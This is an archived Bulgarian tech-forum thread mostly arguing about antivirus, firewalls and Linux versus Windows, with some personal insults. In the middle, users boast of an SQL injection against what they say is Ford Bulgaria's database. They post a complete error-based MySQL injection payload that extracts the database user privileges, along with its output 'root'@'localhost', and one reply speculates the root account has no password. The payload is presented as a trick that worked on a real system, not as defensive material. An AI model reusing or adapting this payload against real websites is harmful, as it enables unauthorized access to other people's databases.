Премини към съдържанието
Форумът в приложение

По-лесно сърфиране. Научи повече.

Kaldata.com - Форуми

Приложение на форума на цял екран с push известия, значки и други.

За да инсталирате това приложение на iOS и iPadOS
  1. Докоснете Иконата за споделяне в Safari
  2. Превъртете менюто и докоснете Добавяне към началния екран.
  3. Докоснете Добавяне в горния десен ъгъл.
За да инсталирате това приложение на Android
  1. Докоснете менюто с 3 точки (⋮) в горния десен ъгъл на браузъра.
  2. Докоснете Добавяне към началния екран или Инсталиране на приложение.
  3. Потвърдете, като докоснете Инсталиране.

Добре дошли!

Добре дошли в нашите форуми, пълни с полезна информация. Имате проблем с компютъра или телефона си? Публикувайте нова тема и ще намерите решение на всичките си проблеми. Общувайте свободно и открийте безброй нови приятели.

Моля, регистрирайте се за да публикувате тема и да получите пълен достъп до всички функции.

"Пълни" приказки,спам и бира на тема Сигурност

Featured Replies

На Windows не са му нужни антивирусни ? http://soft.mail.ru/pressrl_page.php?id=45210

Идейные противники антивирусов, утверждающие, что никакой вирус не сравнится с антивирусами по объему потраченных впустую системных ресурсов, получили новый аргумент в пользу своей позиции. Организаторы двух масштабных исследований пришли к выводу, что регулярное обновление софта и стандартный межсетевой экран Windows вполне могут заменить антивирус на персональном компьютере, обеспечивая защиту от 99,8% угроз.

Да се смееш ли , да плачеш ли?

Интересно обикновенният потребител как ще разбере ,че системата е уязвима и пробита като не ползва програми за защита.

И защо изобщо пък им трябва защитна стена? Нали всичко е обновено и си работи...интернета ти го филтрират доставчиците,службите следят...пък и интернета не ти трябва вече,купуваш си компютър и го оставяш да потъне в прах и нямаш никакви проблеми. А, и не забравяш даси купиш необходимият софтуер да не те гепят случайно качулките.. .

• Отговори 2,2k
  • Прегледи 132,6k
  • Създадено
  • Последен отговор

Каквато и защитна програма да ползваш добрия стар чичо Били винаги ще ти влиза в задния двор.

Каквато и защитна програма да ползваш добрия стар чичо Били винаги ще ти влиза в задния двор.

Ей, пернат индианец,ти ако си мислиш че с линукса не влизат в задния ти двор ,жестоко се лъжеш.

Редактирано от Lost in (преглед на промените)

Ей, пернат индианец,ти ако си мислиш че с линукса не влизат в задния ти двор ,жестоко се лъжеш.

Абе аз пак имам нещо на главата , но под качулката ти май се крие плешива кратуна :clown:

Абе аз пак имам нещо на главата , но под качулката ти май се крие плешива кратуна :clown:

Абе и ти си жива куха лейка ,ама айде не щеш си го призна :P

На Windows не са му нужни антивирусни ? http://soft.mail.ru/...ge.php?id=45210

Да се смееш ли , да плачеш ли?

Интересно обикновенният потребител как ще разбере ,че системата е уязвима и пробита като не ползва програми за защита.

И защо изобщо пък им трябва защитна стена? Нали всичко е обновено и си работи...интернета ти го филтрират доставчиците,службите следят...пък и интернета не ти трябва вече,купуваш си компютър и го оставяш да потъне в прах и нямаш никакви проблеми. А, и не забравяш даси купиш необходимият софтуер да не те гепят случайно качулките.. .

Другият ми комп е архивна мащинка 678 ли, нещо такова Мхц и 256 РАМ. Ми няма антивир, който да не го тормози. Най-лекото решение - нод32 2.70, но те до няколко дни го спират. Пък и се усеща всъщност. И няма антивир. МБАМ и офлайн/онлайн скенери. Моя роднина, който го ползва, между другото браузва много внимателно и засега няма проблем. Почти година. А го преинсталнах преди около година не заради вирус, а защото някой му бе инсталнал някакъв Уиндоус - самоделка..

Само ме притеснява, че стои все логнат и не иска да го промени, което е голяма грешка.

На Уиндоус не знам дали не му трябват антивири. Но лично аз не рискувам. И знам, че няма оптимално решение.

Намерих му на човека една супер лека и юзърска дистрибуция на Линукс, ма той не иска.

Редактирано от metodidamianov (преглед на промените)

Намерих му на човека една супер лека и юзърска дистрибуция на Линукс, ма той не иска.

Подкрепям абсолютно Линукса в тази ситуация.

Ето едно предложение с условието,че не съм го пробвал :ph34r:

Публикувано изображение

:jeer:

Публикувано изображение

unHex-ed: 5.0.90

И понеже 98% не знаят за какво иде реч-това е версията на БД на Форд България : D

SQLi сдруги думи (:

:jeer:

unHex-ed: 5.0.90

И понеже 98% не знаят за какво иде реч-това е версията на БД на Форд България : D

SQLi сдруги думи (:

and 1=1
:D

and 1=1
:D

или:

1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(GRANTEE as char)),0x27,0x7e) FROM information_schema.user_privileges LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

= 'root'@'localhost'

:giggle1:

или:

1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(GRANTEE as char)),0x27,0x7e) FROM information_schema.user_privileges LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

= 'root'@'localhost'

:giggle1:

С това
root'@'localhost
спокойно може да е и MySQL, виждал съм го, без парола

Някой от екипа си прави гавра: http://www.kaldata.com/test.php

Каквито щете настройки му правете , зловредния код намери ли пролука считайте информацията за източена.

Стига сте залъгвали четящите колко велика защита осигурявал , под Уиндоус това е невъзможно !

Ей индианец Публикувано изображение

Голям линуксар стана бе,голямо чудо! До вчера само една програма бай една знай ,сега много открехнат го даваш! :clown:

Още ли се залъгваш като бебе биберон,че си ти мноо защитени личните данни с Линукса?

Ей индианец Публикувано изображение

Голям линуксар стана бе,голямо чудо! До вчера само една програма бай една знай ,сега много открехнат го даваш! :clown:

Още ли се залъгваш като бебе биберон,че си ти мноо защитени личните данни с Линукса?

Ей плагиат откакто ми открадна снимката от подписа голям хакер го раздаваш.

Кой е казал , че има по-добра защитна програма от Комодо за Уиндоус ?

Хах крадеца вика дръжте крадеца.

Това си е лично моя снимка,и всеки който я разпространява си плаща..по един...или друг начин!

Ти вече си плати преди време Публикувано изображение ,за т'ва съм те оставил да пасеш спокойно кравите в гетото!

Хах крадеца вика дръжте крадеца.

Това си е лично моя снимка,и всеки който я разпространява си плаща..по един...или друг начин!

Ти вече си плати преди време Публикувано изображение ,за т'ва съм те оставил да пасеш спокойно кравите в гетото!

Вярно за това леко ти биха шута от Калдата :rolleyes:

Вярно за това леко ти биха шута от Калдата :rolleyes:

Еми ще го бият и те имат крави да пасът не си само ти!

Мухи, Михнев за Вас баннатите се застъпи! Вместо да го уважавате за това пишете простотии !

Не налитай като бик,че...

Публикувано изображение

Редактирано от nikssi (преглед на промените)

Мухи, Михнев за Вас баннатите се застъпи! Вместо да го уважавате за това пишете простотии !

Не налитай като бик,че...

Публикувано изображение

Кой те натиска та звъниш ?

Михлев да ти бяха плащали нямаше толкова добре да се справиш със съсипването на форума :eek:

И точно HIPS-a може да направи програмата непробиваема. Всички разни IDS и Сонар и DeepGuard и пр. (визирам най-големите - BIS, NIS, F-Secure) не могат да достигнат защитеността, която може да се постигне ср/у непознати заплахи с настроен Kaspersky, другата такава програма е Comodo и винаги са ми били любимите...

NIS освен Сонар има и HIPS ;)

Е да, вярно, има, но е по-базов, ако въобще може да се нарече така...

Архивирана тема

Темата е твърде стара и е архивирана. Не можете да добавяте нови отговори в нея, но винаги можете да публикувате нова тема, в която да продължи дискусията. Регистрирайте се или влезте във вашия профил за да публикувате нова тема.

Разглеждащи това в момента 0

• Няма регистрирани потребители разглеждащи тази страница.

Дарение

• Подкрепи съществуването на форума - направи дарение
    32%
    Дарени 315 € от нужните 1 000 €

Бюлетин

Получавайте известие, когато има важна промяна или новина свързана с форума.

Профил

Навигация

Търсене

Търсене

Конфигуриране на push известия в браузъра

Chrome (Android)
  1. Докоснете иконата на катинар до адресната лента.
  2. Докоснете Разрешения → Известия.
  3. Променете предпочитанията си.
Chrome (Desktop)
  1. Кликнете върху иконата на катинар в адресната лента.
  2. Изберете Настройки на сайта.
  3. Намерете Известия и коригирайте предпочитанията си.